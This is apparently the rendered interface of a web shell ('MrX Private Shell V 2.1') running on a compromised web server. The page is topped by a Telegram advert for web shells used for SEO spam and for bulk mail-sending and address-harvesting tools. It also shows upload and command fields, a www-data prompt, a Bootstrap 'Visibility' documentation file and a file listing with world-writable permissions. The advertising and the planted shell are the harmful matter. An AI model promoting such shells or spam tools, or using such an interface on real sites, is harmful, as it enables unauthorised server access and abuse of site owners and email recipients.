__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
---
layout: docs
title: Visibility
description: Control the visibility, without modifying the display, of elements with visibility utilities.
group: utilities
---

Set the `visibility` of elements with our visibility utilities. These utility classes do not modify the `display` value at all and do not affect layout – `.invisible` elements still take up space in the page. Content will be hidden both visually and for assistive technology/screen reader users.

Apply `.visible` or `.invisible` as needed.

```html
<div class="visible">...</div>
<div class="invisible">...</div>
```

```scss
// Class
.visible {
  visibility: visible !important;
}
.invisible {
  visibility: hidden !important;
}

// Usage as a mixin
// Warning: The `invisible()` mixin has been deprecated as of v4.3.0. It will be removed entirely in v5.
.element {
  @include invisible(visible);
}
.element {
  @include invisible(hidden);
}
```

Filemanager

Name Type Size Permission Actions
_index.md File 78 B 0777
borders.md File 2.4 KB 0777
clearfix.md File 915 B 0777
close-icon.md File 365 B 0777
colors.md File 2.68 KB 0777
display.md File 3.88 KB 0777
embed.md File 1.87 KB 0777
flex.md File 22.48 KB 0777
float.md File 1.67 KB 0777
image-replacement.md File 968 B 0777
interactions.md File 814 B 0777
overflow.md File 1006 B 0777
position.md File 1.38 KB 0777
screen-readers.md File 596 B 0777
shadows.md File 740 B 0777
sizing.md File 2.13 KB 0777
spacing.md File 3.95 KB 0777
stretched-link.md File 4.34 KB 0777
text.md File 4.15 KB 0777
vertical-align.md File 1.25 KB 0777
visibility.md File 914 B 0777
Filemanager